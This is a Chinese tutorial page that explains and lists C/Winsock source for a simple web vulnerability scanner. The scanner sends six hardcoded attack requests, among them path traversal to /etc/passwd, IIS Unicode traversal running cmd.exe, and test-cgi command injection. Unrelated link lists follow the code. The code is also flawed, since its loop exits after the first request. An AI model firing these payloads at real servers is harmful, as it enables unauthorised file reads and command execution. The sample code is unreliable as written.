编写漏洞扫描器

一、漏洞扫描器基本原理：

编写漏洞扫描器探查远程服务器上可能存在的具有安全隐患的文件是否存在，它的socket建立过程和上面的端口扫描器是相同的，所不同的是漏洞扫描器通常使用80端口，然后对这个端口发送一个GET文件的请求，服务器接收到请求会返回文件内容，如果文件不存在则返回一个错误提示，通过接收返回内容可以判断文件是否存在。发送和接收数据需要使用函数send()和recv()，另外对流中存在的字符串进行判断需要使用函数strstr()，这除了需要具备socket函数库的知识以外，还需要一些有关string函数库的知识。

二、简单的漏洞扫描源代码：

/********************************************/

/* 端口扫描器 源代码 */

/* CgiScanner.cpp */

/********************************************/

#include <stdio.h>

#include <string.h>

#include <winsock.h>

int main(int argc,char *argv[])

{

if(argc!=2){

printf("Useage : scan [IP address]\n");

return(1);

}

struct sockaddr_in blah;

struct hostent *he;

WSADATA wsaData;

int i;

WORD wVersionRequested;

SOCKET sock;

char buff[1024];

char *ex[10];

ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";

ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";

ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";

ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";

ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";

ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";

char *fmsg="HTTP/1.1 200 OK";

wVersionRequested = MAKEWORD( 1, 1 );

if (WSAStartup(wVersionRequested , &wsaData)){

printf("Winsock Initialization failed.\n");

exit(1);

}

if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){

printf("Can not create socket.\n");

exit(1);

}

sock = socket(AF_INET,SOCK_STREAM,0);

blah.sin_family = AF_INET;

blah.sin_port = htons(80);

blah.sin_addr.s_addr= inet_addr(argv[1]);

if ((he=gethostbyname(argv[1]))!=NULL){

memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);

}

else{

if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){

WSACleanup();

exit(1);

}

}

for (i=1 ; i<7; i++) {

if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){

send(sock,ex[i],strlen(ex[i]),0);

recv(sock,buff,sizeof(buff),0);

if(strstr(buff,fmsg)!=NULL){

printf("\nFound :%s\n", ex[i]);

}

}

closesocket(sock);

WSACleanup();

return(1);

}

}

这段代码可以检测六个漏洞，读者可以根据自己的需要增加漏洞扫描的数量。程序实现的很简洁，概括起来这段程序完成了一下四项工作：

1、连接目标主机SERVER；

2、向目标主机发送GET请求；

3、接收目标返回数据；

4、根据返回数据判断文件是否存在。

• ·蒂森克虏伯接受矿石涨价对中国铁矿石谈判影响
• ·香港裕丰国际前主席诈骗罪名成立
• ·在VC++下实现高彩色工具条
• ·用VC自制“彩票选号器”
• ·在Visual C++6.0中轻松实现上下控件
• ·读取全部的驱动器的信息
• ·用VC++6.0的Sockets API实现聊
• ·Matlab与VC集成
• ·监视、控制计算机的使用
• ·基于 CDialog 的应用程序一开始便被隐藏